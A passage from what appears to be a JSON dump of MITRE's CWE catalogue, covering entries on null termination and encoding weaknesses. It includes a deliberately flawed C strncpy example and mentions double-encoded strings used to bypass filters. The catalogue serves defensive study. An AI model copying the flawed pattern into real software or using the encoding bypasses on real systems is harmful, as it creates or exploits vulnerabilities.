arbitrary NULL character further on down the stack, resulting in a length value that is much larger than the size of string. Readlink() does return the number of bytes copied, but when this return value is the same as stated buf size (in this case MAXPATH), it is impossible to know whether the pathname is precisely that many bytes long, or whether readlink() has truncated the name to avoid overrunning the buffer. In testing, vulnerabilities like this one might not be caught because the unused contents of buf and the memory immediately following it may be NULL, thereby causing strlen() to appear as if it is behaving correctly."},{"Intro_Text":"While the following example is not exploitable, it provides a good example of how nulls can be omitted or misplaced, even when \\"safe\\" functions are used:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"#include <stdio.h>#include <string.h>int main() {}","xhtml:br":["","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"char longString[] = \\"String signifying nothing\\";char shortString[16];strncpy(shortString, longString, 16);printf(\\"The last character in shortString is: %c (%1$x)\\\\n\\", shortString[15]);return (0);","xhtml:br":["","","","","",""]}}}},"Body_Text":"The above code gives the following output: \\"The last character in shortString is: n (6e)\\". So, the shortString array does not end in a NULL character, even though the \\"safe\\" string function strncpy() was used. The reason is that strncpy() does not impliciitly add a NULL character at the end of the string when the source is equal in length or longer than the provided size."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2000-0312","Description":"Attacker does not null-terminate argv[] when invoking another program.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0312"},{"Reference":"CVE-2003-0777","Description":"Interrupted step causes resultant lack of null termination.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0777"},{"Reference":"CVE-2004-1072","Description":"Fault causes resultant lack of null termination, leading to buffer expansion.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1072"},{"Reference":"CVE-2001-1389","Description":"Multiple vulnerabilities related to improper null termination.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1389"},{"Reference":"CVE-2003-0143","Description":"Product does not null terminate a message buffer after snprintf-like call, leading to overflow.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0143"},{"Reference":"CVE-2009-2523","Description":"Chain: product does not handle when an input string is not NULL terminated (CWE-170), leading to buffer over-read (CWE-125) or heap-based buffer overflow (CWE-122).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2523"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Improper Null Termination"},{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"String Termination Error"},{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Miscalculated null termination"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A9","Entry_Name":"Denial of Service","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"POS30-C","Entry_Name":"Use the readlink() function properly","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"STR03-C","Entry_Name":"Do not inadvertently truncate a null-terminated byte string"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"STR32-C","Entry_Name":"Do not pass a non-null-terminated character sequence to a library function that expects a string","Mapping_Fit":"Exact"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP11","Entry_Name":"Improper Null Termination"}]},"Notes":{"Note":[{"#text":"Factors: this is usually resultant from other weaknesses such as off-by-one errors, but it can be primary to boundary condition violations such as buffer overflows. In buffer overflows, it can act as an expander for assumed-immutable data.","attr":{"@_Type":"Relationship"}},{"#text":"Overlaps missing input terminator.","attr":{"@_Type":"Relationship"}},{"attr":{"@_Type":"Applicable Platform"},"xhtml:p":"Conceptually, this does not just apply to the C language; any language or representation that involves a terminator could have this type of problem."},{"#text":"As currently described, this entry is more like a category than a weakness.","attr":{"@_Type":"Maintenance"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Organization":"KDM Analytics","Modification_Date":"2008-08-01","Modification_Comment":"added/updated white box definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Causal_Nature, Common_Consequences, Description, Likelihood_of_Exploit, Maintenance_Notes, Relationships, Other_Notes, Relationship_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"KDM Analytics","Modification_Date":"2009-07-17","Modification_Comment":"Improved the White_Box_Definition"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Common_Consequences, Other_Notes, Potential_Mitigations, White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Causal_Nature, Observed_Examples, Relationships, Taxonomy_Mappings, White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"}]}},"172":{"attr":{"@_ID":"172","@_Name":"Encoding Error","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not properly encode or decode the data, resulting in unexpected values.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"707","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"22","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"41","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-28"},"Phase":"Implementation","Strategy":"Output Encoding","Description":"While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88)."},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Encoding Error"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"120"}},{"attr":{"@_CAPEC_ID":"267"}},{"attr":{"@_CAPEC_ID":"3"}},{"attr":{"@_CAPEC_ID":"52"}},{"attr":{"@_CAPEC_ID":"53"}},{"attr":{"@_CAPEC_ID":"64"}},{"attr":{"@_CAPEC_ID":"71"}},{"attr":{"@_CAPEC_ID":"72"}},{"attr":{"@_CAPEC_ID":"78"}},{"attr":{"@_CAPEC_ID":"80"}}]},"Notes":{"Note":[{"#text":"Partially overlaps path traversal and equivalence weaknesses.","attr":{"@_Type":"Relationship"}},{"#text":"This is more like a category than a weakness.","attr":{"@_Type":"Maintenance"}},{"#text":"Many other types of encodings should be listed in this category.","attr":{"@_Type":"Maintenance"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Maintenance_Notes, Relationships, Relationship_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}]}},"173":{"attr":{"@_ID":"173","@_Name":"Improper Handling of Alternate Encoding","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not properly handle when an input uses an alternate encoding that is valid for the control sphere to which the input is being sent.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"172","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"289","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Bypass Protection Mechanism"}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-44"},"Phase":"Architecture and Design","Strategy":"Input Validation","Description":"Avoid making decisions based on names of resources (e.g. files) if those resources can have alternate names."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-30"},"Phase":"Implementation","Strategy":"Output Encoding","Description":"Use and specify an output encoding that can be handled by the downstream component that is reading the output. Common encodings include ISO-8859-1, UTF-7, and UTF-8. When an encoding is not specified, a downstream component may choose a different encoding, either by assuming a default encoding or automatically inferring which encoding is being used, which can be erroneous. When the encodings are inconsistent, the downstream component might treat some character or byte sequences as special, even if they are not special in the original encoding. Attackers might then be able to exploit this discrepancy and conduct injection attacks; they even might be able to bypass protection mechanisms that assume the original encoding is also being used by the downstream component."},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Alternate Encoding"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"120"}},{"attr":{"@_CAPEC_ID":"267"}},{"attr":{"@_CAPEC_ID":"3"}},{"attr":{"@_CAPEC_ID":"4"}},{"attr":{"@_CAPEC_ID":"52"}},{"attr":{"@_CAPEC_ID":"53"}},{"attr":{"@_CAPEC_ID":"64"}},{"attr":{"@_CAPEC_ID":"71"}},{"attr":{"@_CAPEC_ID":"72"}},{"attr":{"@_CAPEC_ID":"78"}},{"attr":{"@_CAPEC_ID":"79"}},{"attr":{"@_CAPEC_ID":"80"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Alternate Encoding","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Handle Alternate Encoding","attr":{"@_Date":"2010-12-13"}}]}},"174":{"attr":{"@_ID":"174","@_Name":"Double Decoding of the Same Data","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software decodes the same input twice, which can limit the effectiveness of any protection mechanism that occurs in between the decoding operations.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"172","@_View_ID":"1000"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"675","@_View_ID":"1000","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Access Control","Confidentiality","Availability","Integrity","Other"],"Impact":["Bypass Protection Mechanism","Execute Unauthorized Code or Commands","Varies by Context"]}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-44"},"Phase":"Architecture and Design","Strategy":"Input Validation","Description":"Avoid making decisions based on names of resources (e.g. files) if those resources can have alternate names."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-30"},"Phase":"Implementation","Strategy":"Output Encoding","Description":"Use and specify an output encoding that can be handled by the downstream component that is reading the output. Common encodings include ISO-8859-1, UTF-7, and UTF-8. When an encoding is not specified, a downstream component may choose a different encoding, either by assuming a default encoding or automatically inferring which encoding is being used, which can be erroneous. When the encodings are inconsistent, the downstream component might treat some character or byte sequences as special, even if they are not special in the original encoding. Attackers might then be able to exploit this discrepancy and conduct injection attacks; they even might be able to bypass protection mechanisms that assume the original encoding is also being used by the downstream component."},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2004-1315","Description":"Forum software improperly URL decodes the highlight parameter when extracting text to highlight, which allows remote attackers to execute arbitrary PHP code by double-encoding the highlight value so that special characters are inserted into the result.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1315"},{"Reference":"CVE-2004-1939","Description":"XSS protection mechanism attempts to remove \\"/\\" that could be used to close tags, but it can be bypassed using double encoded slashes (%252F)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1939"},{"Reference":"CVE-2001-0333","Description":"Directory traversal using double encoding.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0333"},{"Reference":"CVE-2004-1938","Description":"\\"%2527\\" (double-encoded single quote) used in SQL injection.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1938"},{"Reference":"CVE-2005-1945","Description":"Double hex-encoded data.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1945"},{"Reference":"CVE-2005-0054","Description":"Browser executes HTML at higher privileges via URL with hostnames that are double hex encoded, which are decoded twice to generate a malicious hostname.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0054"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Double Encoding"}},"Notes":{"Note":{"#text":"Probably under-studied.","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Observed_Example, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":{"#text":"Double Encoding","attr":{"@_Date":"2008-04-11"}}}},"175":{"attr":{"@_ID":"175","@_Name":"Improper Handling of Mixed Encoding","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not properly handle when the same input uses several different (mixed) encodings.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"172","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-44"},"Phase":"Architecture and Design","Strategy":"Input Validation","Description":"Avoid making decisions based on names of resources (e.g. files) if those resources can have alternate names."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-30"},"Phase":"Implementation","Strategy":"Output Encoding","Description":"Use and specify an output encoding that can be handled by the downstream component that is reading the output. Common encodings include ISO-8859-1, UTF-7, and UTF-8. When an encoding is not specified, a downstream component may choose a different encoding, either by assuming a default encoding or automatically inferring which encoding is being used, which can be erroneous. When the encodings are inconsistent, the downstream component might treat some character or byte sequences as special, even if they are not special in the original encoding. Attackers might then be able to exploit this discrepancy and conduct injection attacks; they even might be able to bypass protection mechanisms that assume the original encoding is also being used by the downstream component."},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Mixed Encoding"}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Mixed Encoding","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Handle Mixed Encoding","attr":{"@_Date":"2010-12-13"}}]}},"176":{"attr":{"@_ID":"176","@_Name":"Improper Handling of Unicode Encoding","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not properly handle when an input contains Unicode 